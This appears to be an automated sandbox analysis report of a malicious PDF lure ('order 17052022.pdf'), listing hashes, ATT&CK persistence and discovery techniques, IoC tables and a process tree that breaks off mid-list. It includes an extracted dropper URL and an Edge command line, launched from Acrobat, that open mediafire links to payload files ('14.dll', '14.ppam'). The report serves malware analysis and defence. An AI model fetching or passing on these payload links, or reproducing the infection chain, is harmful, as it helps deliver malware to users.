0bf9fd42a0dc842dfe8ad1d5fdaa3f74e5e2ff602887dcfdbc14466f51eef6e0

Analysis

max time kernel
111s
max time network
113s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
17-05-2022 19:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

order 17052022.pdf
Size

30KB
MD5

f7da10c601fc5c0c2caef9f4e06508ad
SHA1

b1f40f4752866c30fbd6654f4844d13ae2958946
SHA256

0bf9fd42a0dc842dfe8ad1d5fdaa3f74e5e2ff602887dcfdbc14466f51eef6e0
SHA512

999c1cf265bd24b51a75bbe6651b2c5b7637b8df6e89a5740e31b6d9e9a74bff19c5ddd8fb445d42cfbe01f26c92db0afa273480f85895a83530ed68a9a392c3

Score

10^/10

persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.mediafire.com/file/ivgr6qe4jfzd1w9/14.dll/file

Signatures

Executes dropped EXE 1 IoCs

Processes:

ddond.com

pid process

4992 ddond.com

pid	process
4992	ddond.com

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\cc12dc4b-a323-437b-9e64-571415a0833e.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220517212452.pma	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exePOWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3180 schtasks.exe

pid	process
3180	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exePOWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

5860 taskkill.exe
5928 taskkill.exe
3828 taskkill.exe

pid	process
5860	taskkill.exe
5928	taskkill.exe
3828	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 2 IoCs

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings	msedge.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

5572 POWERPNT.EXE

pid	process
5572	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

msedge.exemsedge.exeAcroRd32.exemsedge.exemsedge.exemsedge.exeidentity_helper.exe

pid	process
1188	msedge.exe
1188	msedge.exe
1748	msedge.exe
1748	msedge.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
4500	msedge.exe
4500	msedge.exe
5176	msedge.exe
5176	msedge.exe
5252	msedge.exe
5252	msedge.exe
5360	identity_helper.exe
5360	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

msedge.exe

pid process

4500 msedge.exe
4500 msedge.exe
4500 msedge.exe
4500 msedge.exe
4500 msedge.exe
4500 msedge.exe

pid	process
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe

Suspicious use of FindShellTrayWindow 20 IoCs

Processes:

AcroRd32.exemsedge.exe

pid	process
64	AcroRd32.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe
4500	msedge.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

AcroRd32.exeAdobeARM.exePOWERPNT.EXE

pid	process
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
64	AcroRd32.exe
5176	AdobeARM.exe
5572	POWERPNT.EXE
5572	POWERPNT.EXE
5572	POWERPNT.EXE
5572	POWERPNT.EXE
5572	POWERPNT.EXE
5572	POWERPNT.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

AcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 64 wrote to memory of 216	64	AcroRd32.exe	RdrCEF.exe
PID 64 wrote to memory of 216	64	AcroRd32.exe	RdrCEF.exe
PID 64 wrote to memory of 216	64	AcroRd32.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 3648	216	RdrCEF.exe	RdrCEF.exe
PID 64 wrote to memory of 3484	64	AcroRd32.exe	msedge.exe
PID 64 wrote to memory of 3484	64	AcroRd32.exe	msedge.exe
PID 216 wrote to memory of 4336	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 4336	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 4336	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 4336	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 4336	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 4336	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 4336	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 4336	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 4336	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 4336	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 4336	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 4336	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 4336	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 4336	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 4336	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 4336	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 4336	216	RdrCEF.exe	RdrCEF.exe
PID 216 wrote to memory of 4336	216	RdrCEF.exe	RdrCEF.exe

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\order 17052022.pdf"
1⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:64

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
2⤵
- Suspicious use of WriteProcessMemory
PID:216

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=56EC53DF2B66CBC934083B75DF6946BE --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
3⤵
PID:3648

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=844C07BE9E116AF808E5ECFD12437D25 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=844C07BE9E116AF808E5ECFD12437D25 --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1
3⤵
PID:4336

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=81E7FF4BEE639EC88E4D66CADBF1CFA2 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=81E7FF4BEE639EC88E4D66CADBF1CFA2 --renderer-client-id=4 --mojo-platform-channel-handle=2184 --allow-no-sandbox-job /prefetch:1
3⤵
PID:1592

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FED20838FB90D99B288D239A6DEDE4A5 --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
3⤵
PID:3064

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6D09F45E2CD1C838820AD835962F84C0 --mojo-platform-channel-handle=2584 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
3⤵
PID:3828

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=23538A52D9CE8B9B15013A64AF1D2646 --mojo-platform-channel-handle=1956 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
3⤵
PID:1348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/v4sy07laokbd5at/14.ppam/file
2⤵
PID:3484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb62aa46f8,0x7ffb62aa4708,0x7ffb62aa4718
3⤵
PID:1472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,18208547420295663251,11644268674043182771,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
3⤵
PID:4776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,18208547420295663251,11644268674043182771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/v4sy07laokbd5at/14.ppam/file
2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:4500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb62aa46f8,0x7ffb62aa4708,0x7ffb62aa4718
3⤵
PID:3120

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
3⤵
PID:3612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2984 /prefetch:8
3⤵
PID:1296

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:1
3⤵
PID:2004

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
3⤵
PID:4000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:1
3⤵
PID:2836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4492 /prefetch:8
3⤵
PID:1720

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4072 /prefetch:8
3⤵
PID:4680

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
